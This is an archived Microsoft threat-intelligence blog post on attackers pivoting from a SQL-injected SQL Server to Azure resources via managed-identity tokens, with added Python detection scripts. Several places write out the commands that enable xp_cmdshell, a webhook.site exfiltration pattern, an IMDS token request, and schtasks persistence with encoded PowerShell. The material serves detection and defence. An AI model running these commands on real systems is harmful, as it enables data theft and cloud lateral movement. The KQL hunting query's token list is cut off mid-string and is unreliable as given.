{
	"id": "225e9c5b-e8f3-4448-a771-5348fdb756c0",
	"created_at": "2026-04-06T00:13:01.362919Z",
	"updated_at": "2026-04-10T03:21:31.697865Z",
	"deleted_at": null,
	"sha1_hash": "41f08e7bcce8b3b5846c35e9ce2fbf496202cddd",
	"title": "Defending new vectors: Threat actors attempt SQL Server to cloud lateral movement | Microsoft Security Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 314176,
	"plain_text": "Defending new vectors: Threat actors attempt SQL Server to cloud lateral movement | Microsoft Security Blog\r\nBy Microsoft Threat Intelligence\r\nPublished: 2023-10-03 · Archived: 2026-04-05 18:46:38 UTC\r\nMicrosoft security researchers recently identified a campaign where attackers attempted to move laterally to a cloud environment through a SQL Server instance. This attack technique demonstrates an approach we’ve seen in other cloud services such as VMs and Kubernetes clusters, but not in SQL Server. The attackers initially exploited a SQL injection vulnerability in an application within the target’s environment. This allowed the attacker to gain access and elevated permissions on a Microsoft SQL Server instance deployed in an Azure Virtual Machine (VM). The attackers then used the acquired elevated permission to attempt to move laterally to additional cloud resources by abusing the server’s cloud identity. Cloud identities are commonly used in cloud services including SQL Server and may possess elevated permissions to carry out actions in the cloud. This attack highlights the need to properly secure cloud identities to defend SQL Server instances and cloud resources from unauthorized access.\r\nThe attack flow we observed initiated multiple Microsoft Defender for SQL alerts that allowed us to identify and analyze the cloud lateral movement technique. The alerts also allowed us to quickly deploy additional protections despite not having visibility of the application that was targeted with the SQL injection vulnerability to access the SQL Server. While our analysis of this attack did not yield any indication that the attackers successfully moved laterally to the cloud resources, we assess that it is important for defenders to be aware of this technique used in SQL Server instances, and what steps to take to mitigate potential attacks.\r\nFigure 1. 
SQL Server instance to cloud attack chain\r\nIn this blog post, we elaborate on the attack flow and focus on the main technique that we observed: SQL Server to cloud lateral movement. We will also show how Microsoft Defender for SQL can detect activities related to this type of threat and help responders mitigate such attacks.\r\nCloud-based lateral movement\r\nAs more organizations move to the cloud, we see new types of cloud-based attack techniques that are fundamentally different from the ones known from on-premises environments. An example of this is how attackers are finding new vectors to perform lateral movement from certain on-premises environments into cloud resources.\r\nIn cloud environments, one of the methods to perform lateral movement is by abusing cloud identities that are bound to the cloud resource. Cloud services like Azure use managed identities for allocating identities to the various cloud resources. Those identities are used for authentication with other cloud resources and services. While managed identities offer advantages in terms of convenience, security, and efficiency, they also come with certain risks that introduce a potential attack vector.\r\nFor example, if attackers compromised a VM, they could acquire a token for its attached identity by querying the instance metadata service (IMDS) endpoint. With the managed identity access token, the attackers could perform various malicious operations on the cloud resources that the identity has access to. In the attack we observed, the attackers attempted to perform identity-based lateral movement in an environment where we haven’t seen this technique used before: SQL Server instances.\r\nKnown technique, new environment: from SQL Server to cloud\r\nWhile the attempt to move laterally from the SQL Server instance can be considered new, the attack involved activities common to SQL Server attacks. 
For example, the initial access vector was a successful SQL injection attack that allowed the attackers to run queries on the SQL Server. The attackers launched numerous SQL statements to gather data about the host, databases, and network configuration. The information that the attackers collected included:\r\nDatabases\r\nTable names and schema\r\nDatabase version\r\nNetwork configuration\r\nRead/write/delete permissions\r\nWe assess that it is likely that the application targeted with the SQL injection vulnerability had elevated permissions, thus granting the attackers a similar level of access. The attackers used this elevated permission to turn on the xp_cmdshell extended stored procedure, a method to launch operating system (OS) commands through a SQL query. Since xp_cmdshell is turned off by default to prevent exploitation, the attackers used the permissions they acquired to change the SQL configuration and ran the following commands to turn on xp_cmdshell:\r\n1. EXEC master..sp_configure 'SHOW advanced options', 1; RECONFIGURE WITH OVERRIDE;\r\n2. EXEC master..sp_configure 'xp_cmdshell', 1; RECONFIGURE WITH OVERRIDE;\r\n3. EXEC master..sp_configure 'SHOW advanced options', 0; RECONFIGURE WITH OVERRIDE;\r\nAfter enabling xp_cmdshell, the attackers manually initiated a series of operating system commands to launch the next phases of the attack. By using xp_cmdshell, the attackers were able to operate as if they had a shell on the host.\r\nTo collect data, the attackers used simple methods such as reading directories, listing processes, and checking network shares. The attackers downloaded several executables and PowerShell scripts that are encoded and compressed. 
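The three sp_configure statements above are exactly what a SQL Server Audit or Extended Events capture of the attacker's session would record, and the enable-then-execute sequence is a reliable hunting pattern. The following Python is an added example written for this page, not code from Microsoft or from the original post: it normalizes captured T-SQL statements (quoting, bracket delimiters, schema prefixes and spacing all vary between attackers) and flags sessions that switch xp_cmdshell on and then call it. The statements and session ids are constructed for the example.

```python
from collections import defaultdict

Q = chr(39)  # ASCII single quote, used to build the T-SQL string literals below

# Constructed sample of captured statements in the shape a SQL Server Audit or
# Extended Events session records them: (session_id, statement_text).
# Session 51 mirrors the sequence described in the post; session 63 is a DBA
# who only reads the current setting. Both are invented for this example.
SAMPLE_STATEMENTS = [
    (51, 'SELECT name FROM sys.databases'),
    (51, 'SELECT @@VERSION'),
    (51, f'EXEC master..sp_configure {Q}SHOW advanced options{Q},1; RECONFIGURE WITH OVERRIDE;'),
    (51, f'EXEC master..sp_configure {Q}xp_cmdshell{Q}, 1; RECONFIGURE WITH OVERRIDE;'),
    (51, f'EXEC master..sp_configure {Q}SHOW advanced options{Q},0; RECONFIGURE WITH OVERRIDE;'),
    (51, f'EXEC master..xp_cmdshell {Q}whoami /all{Q}'),
    (51, f'EXEC [master].[dbo].[xp_cmdshell] {Q}powershell -enc SQBFAFgA{Q}'),
    (63, f'EXEC sp_configure {Q}xp_cmdshell{Q}'),
    (63, f'SELECT value_in_use FROM sys.configurations WHERE name = {Q}xp_cmdshell{Q}'),
]

# Normalized spellings of the configuration changes this hunt cares about.
CONFIG_EVENTS = {
    'sp_configure show advanced options,1': 'show_advanced_on',
    'sp_configure show advanced options,0': 'show_advanced_off',
    'sp_configure xp_cmdshell,1': 'xp_cmdshell_on',
    'sp_configure xp_cmdshell,0': 'xp_cmdshell_off',
}


def normalize(statement):
    # Lowercase; drop quote and bracket delimiters and the master.. / dbo.
    # prefixes that attackers vary; collapse whitespace; remove spaces around
    # commas so every spelling of the same request compares equal.
    s = statement.lower()
    for ch in (Q, chr(34), '[', ']'):
        s = s.replace(ch, '')
    for prefix in ('master..', 'master.dbo.', 'dbo.'):
        s = s.replace(prefix, '')
    s = ' '.join(s.split())
    return s.replace(' ,', ',').replace(', ', ',')


def classify(statement):
    s = normalize(statement)
    for needle, label in CONFIG_EVENTS.items():
        if needle in s:
            return label
    # An invocation: xp_cmdshell as the procedure of an EXEC, or as the first
    # token of a batch or of a stacked statement after a semicolon. A SELECT
    # that merely mentions the name (reading sys.configurations) is not one.
    tokens = s.replace(';', ' ; ').split()
    for i, tok in enumerate(tokens):
        if tok == 'xp_cmdshell' and (i == 0 or tokens[i - 1] in ('exec', 'execute', ';')):
            return 'xp_cmdshell_exec'
    return None


def hunt_sql_audit(records):
    # Group classified statements per session and rate each session: enabling
    # xp_cmdshell and then executing it is the pattern from the post (high);
    # either half on its own still deserves a look (medium).
    per_session = defaultdict(list)
    for session_id, statement in records:
        label = classify(statement)
        if label is not None:
            per_session[session_id].append((label, statement))
    findings = []
    for session_id, events in sorted(per_session.items()):
        labels = [label for label, _ in events]
        commands = [stmt for label, stmt in events if label == 'xp_cmdshell_exec']
        enabled = 'xp_cmdshell_on' in labels
        if enabled and commands:
            severity = 'high'
        elif enabled or commands:
            severity = 'medium'
        else:
            continue
        findings.append({
            'session_id': session_id,
            'severity': severity,
            'sequence': labels,
            'commands': commands,
            # Switching show advanced options back off hides xp_cmdshell from
            # a plain sp_configure listing, which only shows basic options.
            'advanced_options_reset': enabled and 'show_advanced_off' in labels,
        })
    return findings


if __name__ == '__main__':
    for finding in hunt_sql_audit(SAMPLE_STATEMENTS):
        print(finding)
```

Running the module prints one finding for session 51 rated high, with the ordered sequence show_advanced_on, xp_cmdshell_on, show_advanced_off and two executions; the DBA session produces nothing because reading the setting is neither a change nor an invocation.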
Most of the attacker’s actions from this point were through PowerShell commands, scripts, and modules.\r\nFor persistence, the attackers used a scheduled task to launch a backdoor script. In addition, the attackers tried to get credentials by dumping the SAM and SECURITY registry hives.\r\nThe attackers used a unique method for data exfiltration: they utilized a publicly accessible service called “webhook.site”. This service functions as a free platform for inspecting, debugging, and receiving incoming HTTP requests and emails. Any request directed to this address is promptly logged. The commands follow this pattern: Command | Out-String ;Invoke-WebRequest -Uri https[:]//webhook.site/G-UID. Utilizing this method for data exfiltration allowed the attackers to operate discreetly when transmitting outgoing traffic, as the selected service can be considered legitimate.\r\nWhile looking at the technique used by the attackers to perform lateral movement, we encountered a familiar method implemented in a distinct environment: the attackers tried utilizing the cloud identity of the SQL Server instance by accessing the IMDS and obtaining the cloud identity access token. The IMDS is a RESTful web service that runs on a link-local IP address (169.254.169[.]254) and provides information about the VM, such as the VM’s region, tags, and the identity token. The identity token is a JSON Web Token (JWT) that contains the claims and the signature of the identity.\r\nThe request to the IMDS identity endpoint returns the security credentials (identity token) for the cloud identity. 
For example, in Azure this request would look like: hxxp://169.254.169[.]254/metadata/identity/oauth2/token?api-version=2018-02-01\u0026resource=https://management.azure.com/ (Azure IMDS also requires the request header Metadata: true.)\r\nWith the identity token, the attackers can perform various operations on cloud resources that the cloud identity has access to. They can perform lateral movement across the cloud environment, thus getting access to external services. While the attackers in this case were unsuccessful in their attempts to take advantage of this technique due to an error, we strongly recommend that defenders apply the best practices we provide in this blog post to protect environments against attacks that may use the same technique.\r\nConclusion\r\nTo summarize, this attack demonstrates the attempt to leverage cloud identities in a SQL Server instance for lateral movement. This is a technique we are familiar with in other cloud services such as VMs and Kubernetes clusters but haven’t seen before in SQL Server instances. We have observed numerous attacks attempting to leverage cloud identities in Kubernetes and are aware of the potential risks and impact that can result from unauthorized access to their identity tokens. Similarly, in SQL Server, cloud identities are also commonly employed and might possess elevated permissions to carry out actions in the cloud. Not properly securing cloud identities can expose SQL Server instances and cloud resources to similar risks. This method provides an opportunity for the attackers to achieve greater impact not only on the SQL Server instances but also on the associated cloud resources.\r\nWith the increasing adoption of cloud technology, attackers and threat actors are utilizing known attack techniques in new environments and are becoming more sophisticated. 
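The IMDS token request described in the lateral movement section above, the webhook.site exfiltration pattern and the xp_cmdshell shell spawn all surface as process-creation events whose parent is sqlservr.exe, which is also the filter the Defender hunting query later in this post uses. The Python below is an added example written for this page, not code from Microsoft or from the original post: it runs that logic over constructed process events, separating an IMDS identity-token request from a generic metadata query, flagging request-catcher hosts and a few of the LOLBin tokens from the hunting query, and ignoring IMDS traffic from non-SQL parents, since the Azure guest agent and interactive administrators query IMDS legitimately. Device names, GUIDs and command lines are invented.

```python
from urllib.parse import urlparse

# Parent processes that mean a command came out of SQL Server itself
# (the same list the Defender hunting query on this page uses).
SQL_PARENTS = {'sqlservr.exe', 'sqlagent.exe', 'sqlps.exe', 'launchpad.exe'}
# Azure IMDS listens on this link-local address; the identity endpoint is the
# one that hands out managed identity tokens.
IMDS_HOST = '169.254.169.254'
IMDS_IDENTITY_PATH = '/metadata/identity/'
# Public request-catcher services usable as a drop box; the post saw webhook.site.
REQUEST_CATCHERS = {'webhook.site'}
# A few of the LOLBin tokens from the hunting query on this page.
LOLBIN_TOKENS = ('certutil.exe', 'bitsadmin.exe', 'regsvr32.exe', 'rundll32.exe',
                 'schtasks.exe', 'msbuild.exe', 'mmc.exe')

# Constructed process-creation events in the shape of DeviceProcessEvents
# (initiating process, created process, command line). xp_cmdshell runs its
# argument through cmd.exe, so the interesting text is the cmd.exe command
# line whose parent is sqlservr.exe. All events are invented for the example.
SAMPLE_EVENTS = [
    {'device': 'sqlvm01', 'parent': 'sqlservr.exe', 'process': 'cmd.exe',
     'cmdline': 'cmd.exe /c whoami /all'},
    {'device': 'sqlvm01', 'parent': 'sqlservr.exe', 'process': 'cmd.exe',
     'cmdline': 'cmd.exe /c curl.exe -s -H Metadata:true http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01^&resource=https://management.azure.com/'},
    {'device': 'sqlvm01', 'parent': 'sqlservr.exe', 'process': 'cmd.exe',
     'cmdline': 'cmd.exe /c powershell -c Get-ChildItem C: | Out-String ; Invoke-WebRequest -Uri https://webhook.site/11111111-2222-3333-4444-555555555555 -Method POST'},
    {'device': 'sqlvm01', 'parent': 'sqlservr.exe', 'process': 'cmd.exe',
     'cmdline': 'cmd.exe /c schtasks.exe /create /tn Updater /sc minute /mo 5 /tr powershell -w hidden -enc SQBFAFgA'},
    # Legitimate SQL Agent export job: no URL, no LOLBin, not a shell.
    {'device': 'sqlvm01', 'parent': 'sqlagent.exe', 'process': 'bcp.exe',
     'cmdline': 'bcp.exe Sales.dbo.Orders out orders.dat -n -S localhost -T'},
    # An administrator checking instance metadata interactively: out of scope.
    {'device': 'sqlvm01', 'parent': 'explorer.exe', 'process': 'cmd.exe',
     'cmdline': 'cmd.exe /c curl.exe -H Metadata:true http://169.254.169.254/metadata/instance?api-version=2021-02-01'},
]


def urls_in(cmdline):
    # cmd.exe escapes & | < > with a caret, so ^& in a recorded command line
    # is a plain & once the shell has parsed it; strip carets before parsing.
    found = []
    for token in cmdline.replace('^', '').split():
        token = token.strip('()[]{}<>,;' + chr(34) + chr(39))
        if token.lower().startswith(('http://', 'https://')):
            found.append(urlparse(token))
    return found


def indicators(event):
    reasons = []
    for url in urls_in(event['cmdline']):
        host = (url.hostname or '').lower()
        if host == IMDS_HOST:
            if url.path.lower().startswith(IMDS_IDENTITY_PATH):
                reasons.append('imds_identity_token_request')
            else:
                reasons.append('imds_metadata_query')
        elif host in REQUEST_CATCHERS:
            reasons.append('request_catcher:' + host)
    lowered = event['cmdline'].lower()
    reasons.extend('lolbin:' + tok for tok in LOLBIN_TOKENS if tok in lowered)
    if event['process'].lower() in ('cmd.exe', 'powershell.exe', 'pwsh.exe'):
        reasons.append('shell_spawned')
    return reasons


def severity_of(reasons):
    if any(r == 'imds_identity_token_request' or r.startswith('request_catcher:') for r in reasons):
        return 'high'
    if any(r.startswith('lolbin:') or r == 'imds_metadata_query' for r in reasons):
        return 'medium'
    return 'low'


def hunt_process_events(events):
    # Same scoping as the hunting query: only processes SQL Server started.
    # Every Azure VM talks to IMDS, so the parent filter is what keeps this
    # from paging on normal guest-agent and administrator traffic.
    findings = []
    for event in events:
        if event['parent'].lower() not in SQL_PARENTS:
            continue
        reasons = indicators(event)
        if reasons:
            findings.append({'device': event['device'], 'process': event['process'],
                             'severity': severity_of(reasons), 'reasons': reasons,
                             'cmdline': event['cmdline']})
    return findings


if __name__ == '__main__':
    for finding in hunt_process_events(SAMPLE_EVENTS):
        print(finding['severity'], finding['reasons'])
```

On the sample, the IMDS identity-token request and the webhook.site upload are rated high, the schtasks persistence medium, and the bare whoami low (it is still a shell spawned by SQL Server, which is what the Defender for SQL alert on command shells is about); the bcp job and the administrator's IMDS query are not reported.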
This evolving landscape of cloud-based attack techniques, with lateral movement being one of them, emphasizes the need for organizations to ensure strong defenses and safeguarding of critical assets in the cloud.\r\nThis attack also highlights the importance of least privilege practices when designing and deploying cloud-based and on-premises solutions. Attackers are often able to conduct further malicious activities through abusing over-privileged processes, accounts, managed identities, and database connections. In this case, organizations are recommended to ensure that all applications are updated and secured and are given only the necessary permissions and privileges, to avoid putting connected SQL Server instances, as well as other cloud resources, at risk.\r\nDetection\r\nMicrosoft Defender for Cloud\r\nMicrosoft Defender for Cloud helps to discover and mitigate potential database vulnerabilities and detects anomalous activities that may be an indication of a threat to SQL databases, SQL Servers on machines, open-source databases, and Azure Cosmos DB through Microsoft Defender for SQL.\r\nThe following Defender for SQL alerts might indicate threat activity like the threat described in this blog post:\r\nPotential SQL injection\r\nA possible vulnerability to SQL Injection\r\nSQL Server potentially spawned a Windows command shell and accessed an abnormal external source\r\nAs a cloud-based next-generation database protection solution, Defender for SQL is continuously updated with new detection capabilities and can now detect IMDS calls from SQL Server instances, the technique described in this article.\r\nFigure 2. 
The new alert variant could help detect and mitigate lateral movement\r\nMicrosoft Defender for Cloud also features Microsoft Defender for Resource Manager, which analyzes Azure control plane operations to find abnormal behavior of cloud identities. This coverage can help find lateral movement activities in your cloud environment.\r\nMicrosoft Defender for Endpoint\r\nThe following Microsoft Defender for Endpoint alerts might indicate threat activity related to this threat, specifically the use of the xp_cmdshell command. Note, however, that these alerts can also be triggered by unrelated threat activity.\r\nSQL Server login using xp_cmdshell\r\nSuspicious SQLCMD activity\r\nMitigation\r\nThe vulnerability assessment solution in Defender for SQL can also detect vulnerabilities and misconfigurations in the database. Mitigating and responding to vulnerabilities reduces the attack surface of the SQL Server and can prevent potential attacks. One of the SQL vulnerability assessment rules involves the enablement of xp_cmdshell, providing a means to identify database instances where this setting is enabled.\r\nWith this coverage of the wide aspects of lateral movement in the cloud, and the correlations between them, organizations can strengthen their defenses and safeguard their critical assets from the risk of lateral movement. We also recommend following security best practices for managed identities to prevent lateral movement in the cloud. By implementing those security measures and adhering to the least privilege principle when granting permissions to managed identities, organizations can reduce the attack surface of those identities.\r\nHunting queries\r\nMicrosoft 365 Defender\r\nMicrosoft 365 Defender is becoming Microsoft Defender XDR. 
Microsoft 365 Defender customers can run the following query to find related activity in their networks:\r\nSQL Server abuse\r\nSQL Server offers a vast array of tools for automating tasks, exporting data, and running scripts. These legitimate tools can be repurposed by attackers. Because there are so many powerful commands an attacker might exploit, hunting for malicious activity involving SQL Server can be complicated.\r\nThis query detects instances of a SQL Server process launching a shell to run one or more suspicious commands.\r\nlet relevantCmdlineTokens = pack_array(\"advpack.dll\",\"appvlp.exe\",\"atbroker.exe\",\"bash.exe\",\"bginfo.exe\",\"bitsadmin.exe\",\"cdb.exe\",\"certutil.exe\",\"cl_invocation.ps1\",\"c\r\nWebRequest\",\"makecab.exe\",\"manage-bde.wsf\",\"mavinject.exe\",\"mftrace.exe\",\"microsoft.workflow.compiler.exe\",\"mmc.exe\",\"msbuild.exe\",\r\ncimprovider.exe\",\"regsvcs.exe\",\"regsvr32.exe\",\"replace.exe\",\"rundll32.exe\",\"runonce.exe\",\"runscripthelper.exe\",\"schtasks.exe\",\"scri\r\nDeviceProcessEvents\r\n| where Timestamp \u003e= ago(10d)\r\n| where InitiatingProcessFileName in~ (\"sqlservr.exe\", \"sqlagent.exe\", \"sqlps.exe\", \"launchpad.exe\")\r\n| summarize DistinctProcessCommandLines = tostring(makeset(ProcessCommandLine)) by DeviceId, bin(Timestamp, 2m)\r\n| where DistinctProcessCommandLines has_any(relevantCmdlineTokens)\r\nMicrosoft Sentinel\r\nMicrosoft Sentinel customers can deploy the Azure SQL solution that allows security analysts and administrators to rapidly deploy a range of detection and hunting queries to their Microsoft Sentinel environment. 
For instance, the solution’s analytical rules assist in pinpointing unique SQL queries that attempt or succeed in executing commands – such as attempts to execute shell commands, suggestive of potential security risks. Additionally, the hunting queries will highlight instances where potentially risky stored procedures like xp_cmdshell are called upon.\r\nMicrosoft Sentinel has a range of detection and threat hunting content that customers can use to detect the activity detailed in this blog:\r\nAttempts to execute shell command\r\nSuspicious stored procedures like xp_cmdshell\r\nIf the Azure SQL Solution is not currently deployed, Microsoft Sentinel customers can install the solution from the Content Hub to have the rules deployed in their Sentinel workspace. More details on the Content Hub can be found here: https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy.\r\nSunders Bruskin, Hagai Ran Kestenberg, Fady Nasereldeen, Cloud researchers in Microsoft Threat Intelligence team\r\nFurther reading\r\nFor the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.\r\nTo get notified about new publications and to join discussions on social media, follow us on Twitter at https://twitter.com/MsftSecIntel.\r\nSource: https://www.microsoft.com/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.microsoft.com/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/"
	],
	"report_names": [
		"defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement"
	],
	"threat_actors": [],
	"ts_created_at": 1775434381,
	"ts_updated_at": 1775791291,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/41f08e7bcce8b3b5846c35e9ce2fbf496202cddd.pdf",
		"text": "https://archive.orkl.eu/41f08e7bcce8b3b5846c35e9ce2fbf496202cddd.txt",
		"img": "https://archive.orkl.eu/41f08e7bcce8b3b5846c35e9ce2fbf496202cddd.jpg"
	}
}